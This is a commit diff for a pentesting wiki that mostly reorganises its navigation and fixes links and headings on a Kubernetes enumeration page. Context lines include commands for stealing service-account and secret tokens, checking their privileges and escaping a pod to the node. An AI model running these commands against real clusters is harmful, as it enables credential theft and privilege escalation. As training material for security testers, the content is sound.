GitBook: [#3161] No subject

README.md

@@ -78,8 +78,8 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
 
 You can find **my reviews of the certifications eMAPT and eWPTXv2** (and their **respective preparation courses**) in the following page:
 
-{% content-ref url="courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md" %}
-[ine-courses-and-elearnsecurity-certifications-reviews.md](courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md)
+{% content-ref url="external-platforms-reviews-writeups/ine-courses-and-elearnsecurity-certifications-reviews.md" %}
+[ine-courses-and-elearnsecurity-certifications-reviews.md](external-platforms-reviews-writeups/ine-courses-and-elearnsecurity-certifications-reviews.md)
 {% endcontent-ref %}
 
 ## License

SUMMARY.md

@@ -25,6 +25,37 @@
   * [Clone a Website](generic-methodologies-and-resources/phishing-methodology/clone-a-website.md)
   * [Detecting Phising](generic-methodologies-and-resources/phishing-methodology/detecting-phising.md)
   * [Phishing Documents](generic-methodologies-and-resources/phishing-methodology/phishing-documents.md)
+* [Basic Forensic Methodology](generic-methodologies-and-resources/basic-forensic-methodology/README.md)
+  * [Baseline Monitoring](generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md)
+  * [Anti-Forensic Techniques](generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md)
+  * [Docker Forensics](generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md)
+  * [Image Adquisition & Mount](generic-methodologies-and-resources/basic-forensic-methodology/image-adquisition-and-mount.md)
+  * [Linux Forensics](generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md)
+  * [Malware Analysis](generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md)
+  * [Memory dump analysis](generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md)
+    * [Volatility - CheatSheet](generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md)
+  * [Partitions/File Systems/Carving](generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md)
+    * [EXT](generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/ext.md)
+    * [File/Data Carving & Recovery Tools](generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md)
+    * [NTFS](generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md)
+  * [Pcap Inspection](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md)
+    * [DNSCat pcap analysis](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md)
+    * [USB Keystrokes](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md)
+    * [Wifi Pcap Analysis](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md)
+    * [Wireshark tricks](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md)
+  * [Specific Software/File-Type Tricks](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md)
+    * [Decompile compiled python binaries (exe, elf) - Retreive from .pyc](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
+    * [Browser Artifacts](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md)
+    * [Desofuscation vbs (cscript.exe)](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md)
+    * [Local Cloud Storage](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md)
+    * [Office file analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md)
+    * [PDF File analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md)
+    * [PNG tricks](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md)
+    * [Video and Audio file analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md)
+    * [ZIPs tricks](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md)
+  * [Windows Artifacts](generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md)
+    * [Windows Processes](generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/windows-processes.md)
+    * [Interesting Windows Registry Keys](generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md)
 * [Brute Force - CheatSheet](generic-methodologies-and-resources/brute-force.md)
 * [Exfiltration](generic-methodologies-and-resources/exfiltration.md)
 * [Tunneling and Port Forwarding](generic-methodologies-and-resources/tunneling-and-port-forwarding.md)
@@ -367,7 +398,7 @@
 * [47808/udp - Pentesting BACNet](network-services-pentesting/47808-udp-bacnet.md)
 * [50030,50060,50070,50075,50090 - Pentesting Hadoop](network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md)
 
-***
+## 🕸 Pentesting Web
 
 * [Web Vulnerabilities Methodology](pentesting-web/web-vulnerabilities-methodology.md)
 * [Reflecting Techniques - PoCs and Polygloths CheatSheet](pentesting-web/pocs-and-polygloths-cheatsheet/README.md)
@@ -389,7 +420,7 @@
 * [CRLF (%0D%0A) Injection](pentesting-web/crlf-0d-0a.md)
 * [Cross-site WebSocket hijacking (CSWSH)](pentesting-web/cross-site-websocket-hijacking-cswsh.md)
 * [CSRF (Cross Site Request Forgery)](pentesting-web/csrf-cross-site-request-forgery.md)
-* [Dangling Markup - HTML scriptless injection](pentesting-web/dangling-markup-html-scriptless-injection.md)
+* [Dangling Markup - HTML scriptless injection](pentesting-web/dangling-markup-html-scriptless-injection/README.md)
   * [HTML Injection / Char-by-char Exfiltration](pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/README.md)
     * [CSS Injection Code](pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/css-injection-code.md)
 * [Deserialization](pentesting-web/deserialization/README.md)
@@ -423,10 +454,10 @@
 * [hop-by-hop headers](pentesting-web/abusing-hop-by-hop-headers.md)
 * [IDOR](pentesting-web/idor.md)
 * [JWT Vulnerabilities (Json Web Tokens)](pentesting-web/hacking-jwt-json-web-tokens.md)
-* [NoSQL injection](pentesting-web/nosql-injection.md)
 * [LDAP Injection](pentesting-web/ldap-injection.md)
 * [Login Bypass](pentesting-web/login-bypass/README.md)
   * [Login bypass List](pentesting-web/login-bypass/sql-login-bypass.md)
+* [NoSQL injection](pentesting-web/nosql-injection.md)
 * [OAuth to Account takeover](pentesting-web/oauth-to-account-takeover.md)
 * [Open Redirect](pentesting-web/open-redirect.md)
 * [Parameter Pollution](pentesting-web/parameter-pollution.md)
@@ -475,37 +506,10 @@
   * [Steal Info JS](pentesting-web/xss-cross-site-scripting/steal-info-js.md)
 * [XSSI (Cross-Site Script Inclusion)](pentesting-web/xssi-cross-site-script-inclusion.md)
 * [XS-Search](pentesting-web/xs-search.md)
-* [Basic Forensic Methodology](forensics/basic-forensic-methodology/README.md)
-  * [Baseline Monitoring](forensics/basic-forensic-methodology/file-integrity-monitoring.md)
-  * [Anti-Forensic Techniques](forensics/basic-forensic-methodology/anti-forensic-techniques.md)
-  * [Docker Forensics](forensics/basic-forensic-methodology/docker-forensics.md)
-  * [Image Adquisition & Mount](forensics/basic-forensic-methodology/image-adquisition-and-mount.md)
-  * [Linux Forensics](forensics/basic-forensic-methodology/linux-forensics.md)
-  * [Malware Analysis](forensics/basic-forensic-methodology/malware-analysis.md)
-  * [Memory dump analysis](forensics/basic-forensic-methodology/memory-dump-analysis/README.md)
-    * [Volatility - CheatSheet](forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md)
-  * [Partitions/File Systems/Carving](forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md)
-    * [EXT](forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md)
-    * [File/Data Carving & Recovery Tools](forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md)
-    * [NTFS](forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md)
-  * [Pcap Inspection](forensics/basic-forensic-methodology/pcap-inspection/README.md)
-    * [DNSCat pcap analysis](forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md)
-    * [USB Keystrokes](forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md)
-    * [Wifi Pcap Analysis](forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md)
-    * [Wireshark tricks](forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md)
-  * [Specific Software/File-Type Tricks](forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md)
-    * [Decompile compiled python binaries (exe, elf) - Retreive from .pyc](forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
-    * [Browser Artifacts](forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md)
-    * [Desofuscation vbs (cscript.exe)](forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md)
-    * [Local Cloud Storage](forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md)
-    * [Office file analysis](forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md)
-    * [PDF File analysis](forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md)
-    * [PNG tricks](forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md)
-    * [Video and Audio file analysis](forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md)
-    * [ZIPs tricks](forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md)
-  * [Windows Artifacts](forensics/basic-forensic-methodology/windows-forensics/README.md)
-    * [Windows Processes](forensics/basic-forensic-methodology/windows-forensics/windows-processes.md)
-    * [Interesting Windows Registry Keys](forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md)
+
+## ⛈ Cloud Security
+
+* [Cloud Security](cloud-security/cloud-security.md)
 * [GCP Security](cloud-security/gcp-security/README.md)
   * [GCP - Other Services Enumeration](cloud-security/gcp-security/gcp-looting.md)
   * [GCP - Abuse GCP Permissions](cloud-security/gcp-security/gcp-interesting-permissions/README.md)
@@ -525,22 +529,22 @@
   * [Basic Github Information](cloud-security/github-security/basic-github-information.md)
 * [Gitea Security](cloud-security/gitea-security/README.md)
   * [Basic Gitea Information](cloud-security/gitea-security/basic-gitea-information.md)
-* [Kubernetes Security](pentesting/pentesting-kubernetes/README.md)
-  * [Kubernetes Basics](pentesting/pentesting-kubernetes/kubernetes-basics.md)
-  * [Pentesting Kubernetes Services](pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md)
-  * [Exposing Services in Kubernetes](pentesting/pentesting-kubernetes/exposing-services-in-kubernetes.md)
-  * [Attacking Kubernetes from inside a Pod](pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md)
+* [Kubernetes Security](cloud-security/pentesting-kubernetes/README.md)
+  * [Kubernetes Basics](cloud-security/pentesting-kubernetes/kubernetes-basics.md)
+  * [Pentesting Kubernetes Services](cloud-security/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md)
+  * [Exposing Services in Kubernetes](cloud-security/pentesting-kubernetes/exposing-services-in-kubernetes.md)
+  * [Attacking Kubernetes from inside a Pod](cloud-security/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md)
   * [Kubernetes Enumeration](cloud-security/pentesting-kubernetes/kubernetes-enumeration.md)
-  * [Kubernetes Role-Based Access Control (RBAC)](pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md)
+  * [Kubernetes Role-Based Access Control (RBAC)](cloud-security/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md)
   * [Abusing Roles/ClusterRoles in Kubernetes](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md)
     * [K8s Roles Abuse Lab](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/k8s-roles-abuse-lab.md)
     * [Pod Escape Privileges](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md)
   * [Kubernetes Namespace Escalation](cloud-security/pentesting-kubernetes/namespace-escalation.md)
   * [Kubernetes Access to other Clouds](cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md)
-  * [Kubernetes Hardening](pentesting/pentesting-kubernetes/kubernetes-hardening/README.md)
-    * [Monitoring with Falco](pentesting/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md)
-    * [Kubernetes SecurityContext(s)](pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md)
-    * [Kubernetes NetworkPolicies](pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md)
+  * [Kubernetes Hardening](cloud-security/pentesting-kubernetes/kubernetes-hardening/README.md)
+    * [Monitoring with Falco](cloud-security/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md)
+    * [Kubernetes SecurityContext(s)](cloud-security/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md)
+    * [Kubernetes NetworkPolicies](cloud-security/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md)
   * [Kubernetes Network Attacks](cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md)
 * [Concourse](cloud-security/concourse/README.md)
   * [Concourse Architecture](cloud-security/concourse/concourse-architecture.md)
@@ -554,43 +558,56 @@
 * [Atlantis](cloud-security/atlantis.md)
 * [Cloud Security Review](cloud-security/cloud-security-review.md)
 * [AWS Security](cloud-security/aws-security.md)
-* [BRA.I.NSMASHER Presentation](a.i.-exploiting/bra.i.nsmasher-presentation/README.md)
-  * [Basic Bruteforcer](a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md)
-  * [Basic Captcha Breaker](a.i.-exploiting/bra.i.nsmasher-presentation/basic-captcha-breaker.md)
-  * [BIM Bruteforcer](a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md)
-  * [Hybrid Malware Classifier Part 1](a.i.-exploiting/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md)
-  * [ML Basics](a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/README.md)
-    * [Feature Engineering](a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md)
+
+## 😎 Hardware/Physical Access
+
+* [Physical Attacks](hardware-physical-access/physical-attacks.md)
+* [Escaping from KIOSKs](hardware-physical-access/escaping-from-gui-applications/README.md)
+  * [Show file extensions](hardware-physical-access/escaping-from-gui-applications/show-file-extensions.md)
+* [Firmware Analysis](hardware-physical-access/firmware-analysis/README.md)
+  * [Bootloader testing](hardware-physical-access/firmware-analysis/bootloader-testing.md)
+  * [Firmware Integrity](hardware-physical-access/firmware-analysis/firmware-integrity.md)
+
+## 🧐 External Platforms Reviews/Writeups
+
+* [BRA.I.NSMASHER Presentation](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/README.md)
+  * [Basic Bruteforcer](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/basic-bruteforcer.md)
+  * [Basic Captcha Breaker](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/basic-captcha-breaker.md)
+  * [BIM Bruteforcer](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/bim-bruteforcer.md)
+  * [Hybrid Malware Classifier Part 1](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md)
+  * [ML Basics](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/ml-basics/README.md)
+    * [Feature Engineering](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md)
+* [INE Courses and eLearnSecurity Certifications Reviews](external-platforms-reviews-writeups/ine-courses-and-elearnsecurity-certifications-reviews.md)
+
+## Group 1
+
+* [Reversing & Exploiting](group-1/reversing-and-exploiting.md)
+* [Reversing Tools & Basic Methods](group-1/reversing-tools-basic-methods/README.md)
+  * [Angr](group-1/reversing-tools-basic-methods/angr/README.md)
+    * [Angr - Examples](group-1/reversing-tools-basic-methods/angr/angr-examples.md)
+  * [Z3 - Satisfiability Modulo Theories (SMT)](group-1/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md)
+  * [Cheat Engine](group-1/reversing-tools-basic-methods/cheat-engine.md)
+  * [Blobrunner](group-1/reversing-tools-basic-methods/blobrunner.md)
+* [Common API used in Malware](group-1/common-api-used-in-malware.md)
+* [Linux Exploiting (Basic) (SPA)](group-1/linux-exploiting-basic-esp/README.md)
+  * [Format Strings Template](group-1/linux-exploiting-basic-esp/format-strings-template.md)
+  * [ROP - call sys\_execve](group-1/linux-exploiting-basic-esp/rop-syscall-execv.md)
+  * [ROP - Leaking LIBC address](group-1/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md)
+    * [ROP - Leaking LIBC template](group-1/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md)
+  * [Bypassing Canary & PIE](group-1/linux-exploiting-basic-esp/bypassing-canary-and-pie.md)
+  * [Ret2Lib](group-1/linux-exploiting-basic-esp/ret2lib.md)
+  * [Fusion](group-1/linux-exploiting-basic-esp/fusion.md)
+* [Exploiting Tools](group-1/tools/README.md)
+  * [PwnTools](group-1/tools/pwntools.md)
+* [Windows Exploiting (Basic Guide - OSCP lvl)](group-1/windows-exploiting-basic-guide-oscp-lvl.md)
+
+***
+
 * [Blockchain & Crypto Currencies](blockchain/blockchain-and-crypto-currencies/README.md)
   * [Page 1](blockchain/blockchain-and-crypto-currencies/page-1.md)
-* [INE Courses and eLearnSecurity Certifications Reviews](courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md)
-* [Physical Attacks](physical-attacks/physical-attacks.md)
-* [Escaping from KIOSKs](physical-attacks/escaping-from-gui-applications/README.md)
-  * [Show file extensions](physical-attacks/escaping-from-gui-applications/show-file-extensions.md)
-* [Firmware Analysis](physical-attacks/firmware-analysis/README.md)
-  * [Bootloader testing](physical-attacks/firmware-analysis/bootloader-testing.md)
-  * [Firmware Integrity](physical-attacks/firmware-analysis/firmware-integrity.md)
-* [Reversing Tools & Basic Methods](reversing/reversing-tools-basic-methods/README.md)
-  * [Angr](reversing/reversing-tools-basic-methods/angr/README.md)
-    * [Angr - Examples](reversing/reversing-tools-basic-methods/angr/angr-examples.md)
-  * [Z3 - Satisfiability Modulo Theories (SMT)](reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md)
-  * [Cheat Engine](reversing/reversing-tools-basic-methods/cheat-engine.md)
-  * [Blobrunner](reversing/reversing-tools-basic-methods/blobrunner.md)
-* [Common API used in Malware](reversing/common-api-used-in-malware.md)
 * [Cryptographic/Compression Algorithms](reversing/cryptographic-algorithms/README.md)
   * [Unpacking binaries](reversing/cryptographic-algorithms/unpacking-binaries.md)
 * [Word Macros](reversing/word-macros.md)
-* [Linux Exploiting (Basic) (SPA)](exploiting/linux-exploiting-basic-esp/README.md)
-  * [Format Strings Template](exploiting/linux-exploiting-basic-esp/format-strings-template.md)
-  * [ROP - call sys\_execve](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md)
-  * [ROP - Leaking LIBC address](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md)
-    * [ROP - Leaking LIBC template](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md)
-  * [Bypassing Canary & PIE](exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md)
-  * [Ret2Lib](exploiting/linux-exploiting-basic-esp/ret2lib.md)
-  * [Fusion](exploiting/linux-exploiting-basic-esp/fusion.md)
-* [Exploiting Tools](exploiting/tools/README.md)
-  * [PwnTools](exploiting/tools/pwntools.md)
-* [Windows Exploiting (Basic Guide - OSCP lvl)](exploiting/windows-exploiting-basic-guide-oscp-lvl.md)
 * [Certificates](cryptography/certificates.md)
 * [Cipher Block Chaining CBC-MAC](cryptography/cipher-block-chaining-cbc-mac-priv.md)
 * [Crypto CTFs Tricks](cryptography/crypto-ctfs-tricks.md)

cloud-security/cloud-security.md

@@ -0,0 +1,2 @@
+# Cloud Security
+

cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md

@@ -163,8 +163,8 @@ kubectl run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hos
 
 Now that you can escape to the node check post-exploitation techniques in:
 
-{% content-ref url="../../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md" %}
-[attacking-kubernetes-from-inside-a-pod.md](../../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md)
+{% content-ref url="../attacking-kubernetes-from-inside-a-pod.md" %}
+[attacking-kubernetes-from-inside-a-pod.md](../attacking-kubernetes-from-inside-a-pod.md)
 {% endcontent-ref %}
 
 #### Stealth

cloud-security/pentesting-kubernetes/kubernetes-enumeration.md

@@ -1,4 +1,4 @@
-
+# Kubernetes Enumeration
 
 <details>
 
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 
 </details>
 
-
-# Kubernetes Tokens
+## Kubernetes Tokens
 
 If you have compromised access to a machine the user may have access to some Kubernetes platform. The token is usually located in a file pointed by the **env var `KUBECONFIG`** or **inside `~/.kube`**.
 
@@ -25,9 +24,9 @@ In this folder you might find config files with **tokens and configurations to c
 
 If you have compromised a pod inside a kubernetes environment, there are other places where you can find tokens and information about the current K8 env:
 
-## Service Account Tokens
+### Service Account Tokens
 
-Before continuing, if you don't know what is a service in Kubernetes I would suggest you to [**follow this link and read at least the information about Kubernetes architecture**](../../pentesting/pentesting-kubernetes/#architecture)**.**
+Before continuing, if you don't know what is a service in Kubernetes I would suggest you to [**follow this link and read at least the information about Kubernetes architecture**](./#architecture)**.**
 
 Taken from the Kubernetes [documentation](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/#use-the-default-service-account-to-access-the-api-server):
 
@@ -60,15 +59,15 @@ Default location on **Minikube**:
 
 * /var/lib/localkube/certs
 
-## Hot Pods
+### Hot Pods
 
 _**Hot pods are**_ pods containing a privileged service account token. A privileged service account token is a token that has permission to do privileged tasks such as listing secrets, creating pods, etc.
 
-# RBAC
+## RBAC
 
-If you don't know what is **RBAC**, [**read this section**](../../pentesting/pentesting-kubernetes/#cluster-hardening-rbac).
+If you don't know what is **RBAC**, [**read this section**](./#cluster-hardening-rbac).
 
-# Enumeration CheatSheet
+## Enumeration CheatSheet
 
 In order to enumerate a K8s environment you need a couple of this:
 
@@ -80,7 +79,7 @@ With those details you can **enumerate kubernetes**. If the **API** for some rea
 
 However, usually the **API server is inside an internal network**, therefore you will need to **create a tunnel** through the compromised machine to access it from your machine, or you can **upload the** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, or use **`curl/wget/anything`** to perform raw HTTP requests to the API server.
 
-## Differences between `list` and `get` verbs
+### Differences between `list` and `get` verbs
 
 With **`get`** permissions you can access information of specific assets (_`describe` option in `kubectl`_) API:
 
@@ -113,7 +112,7 @@ They open a streaming connection that returns you the full manifest of a Deploym
 The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to use `describe` instead of `get`
 {% endhint %}
 
-## Using curl
+### Using curl
 
 From inside a pod you can use several env variables:
 
@@ -126,7 +125,7 @@ export CACERT=${SERVICEACCOUNT}/ca.crt
 alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\""
 ```
 
-## Using kubectl
+### Using kubectl
 
 Having the token and the address of the API server you use kubectl or curl to access it as indicated here:
 
@@ -138,7 +137,7 @@ You can find an [**official kubectl cheatsheet here**](https://kubernetes.io/doc
 
 To find the HTTP request that `kubectl` sends you can use the parameter `-v=8`
 
-## Current Configuration
+### Current Configuration
 
 {% tabs %}
 {% tab title="Kubectl" %}
@@ -167,7 +166,7 @@ kubectl config set-credentials USER_NAME \
    --auth-provider-arg=id-token=( your id_token )
 ```
 
-## Get Supported Resources
+### Get Supported Resources
 
 With this info you will know all the services you can list
 
@@ -180,7 +179,7 @@ k api-resources --namespaced=false #Resources NOT specific to a namespace
 {% endtab %}
 {% endtabs %}
 
-## Get Current Privileges
+### Get Current Privileges
 
 {% tabs %}
 {% tab title="kubectl" %}
@@ -205,8 +204,8 @@ kurl -i -s -k -X $'POST' \
 
 You can learn more about **Kubernetes RBAC** in
 
-{% content-ref url="../../pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md" %}
-[kubernetes-role-based-access-control-rbac.md](../../pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md)
+{% content-ref url="kubernetes-role-based-access-control-rbac.md" %}
+[kubernetes-role-based-access-control-rbac.md](kubernetes-role-based-access-control-rbac.md)
 {% endcontent-ref %}
 
 **Once you know which privileges** you have, check the following page to figure out **if you can abuse them** to escalate privileges:
@@ -215,7 +214,7 @@ You can learn more about **Kubernetes RBAC** in
 [abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/)
 {% endcontent-ref %}
 
-## Get Others roles
+### Get Others roles
 
 {% tabs %}
 {% tab title="kubectl" %}
@@ -233,7 +232,7 @@ kurl -k -v "https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eevee/clu
 {% endtab %}
 {% endtabs %}
 
-## Get namespaces
+### Get namespaces
 
 Kubernetes supports **multiple virtual clusters** backed by the same physical cluster. These virtual clusters are called **namespaces**.
 
@@ -251,7 +250,7 @@ kurl -k -v https://$APISERVER/api/v1/namespaces/
 {% endtab %}
 {% endtabs %}
 
-## Get secrets
+### Get secrets
 
 {% tabs %}
 {% tab title="kubectl" %}
@@ -276,7 +275,7 @@ If you can read secrets you can use the following lines to get the privileges re
 for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; k --token $token auth can-i --list; echo; done
 ```
 
-## Get Service Accounts
+### Get Service Accounts
 
 As discussed at the begging of this page **when a pod is run a service account is usually assigned to it**. Therefore, listing the service accounts, their permissions and where are they running may allow a user to escalate privileges.
 
@@ -294,7 +293,7 @@ curl -k -v https://$APISERVER/api/v1/namespaces/{namespace}/serviceaccounts
 {% endtab %}
 {% endtabs %}
 
-## Get Deployments
+### Get Deployments
 
 The deployments specify the **components** that need to be **run**.
 
@@ -313,7 +312,7 @@ curl -v https://$APISERVER/api/v1/namespaces/<namespace>/deployments/
 {% endtab %}
 {% endtabs %}
 
-## Get Pods
+### Get Pods
 
 The Pods are the actual **containers** that will **run**.
 
@@ -332,7 +331,7 @@ curl -v https://$APISERVER/api/v1/namespaces/<namespace>/pods/
 {% endtab %}
 {% endtabs %}
 
-## Get Services
+### Get Services
 
 Kubernetes **services** are used to **expose a service in a specific port and IP** (which will act as load balancer to the pods that are actually offering the service). This is interesting to know where you can find other services to try to attack.
 
@@ -351,7 +350,7 @@ curl -v https://$APISERVER/api/v1/namespaces/default/services/
 {% endtab %}
 {% endtabs %}
 
-## Get nodes
+### Get nodes
 
 Get all the **nodes configured inside the cluster**.
 
@@ -369,7 +368,7 @@ curl -v https://$APISERVER/api/v1/nodes/
 {% endtab %}
 {% endtabs %}
 
-## Get DaemonSets
+### Get DaemonSets
 
 **DaeamonSets** allows to ensure that a **specific pod is running in all the nodes** of the cluster (or in the ones selected). If you delete the DaemonSet the pods managed by it will be also removed.
 
@@ -387,7 +386,7 @@ curl -v https://$APISERVER/apis/extensions/v1beta1/namespaces/default/daemonsets
 {% endtab %}
 {% endtabs %}
 
-## Get cronjob
+### Get cronjob
 
 Cron jobs allows to schedule using crontab like syntax the launch of a pod that will perform some action.
 
@@ -405,7 +404,7 @@ curl -v https://$APISERVER/apis/batch/v1beta1/namespaces/<namespace>/cronjobs
 {% endtab %}
 {% endtabs %}
 
-## Get "all"
+### Get "all"
 
 {% tabs %}
 {% tab title="kubectl" %}
@@ -415,7 +414,7 @@ k get all
 {% endtab %}
 {% endtabs %}
 
-## **Get Pods consumptions**
+### **Get Pods consumptions**
 
 {% tabs %}
 {% tab title="kubectl" %}
@@ -425,7 +424,7 @@ k top pod --all-namespaces
 {% endtab %}
 {% endtabs %}
 
-## Escaping from the pod
+### Escaping from the pod
 
 If you are able to create new pods you might be able to escape from them to the node. In order to do so you need to create a new pod using a yaml file, switch to the created pod and then chroot into the node's system. You can use already existing pods as reference for the yaml file since they display existing images and pathes.
 
@@ -480,11 +479,10 @@ chroot /root /bin/bash
 
 Information obtained from: [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube – Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
 
-# References
+## References
 
 {% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3" %}
 
-
 <details>
 
 <summary><strong>Support HackTricks and get benefits!</strong></summary>
@@ -500,5 +498,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
 
 </details>
-
-

cloud-security/pentesting-kubernetes/namespace-escalation.md

@@ -1,4 +1,4 @@
-
+# Kubernetes Namespace Escalation
 
 <details>
 
@@ -16,12 +16,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 
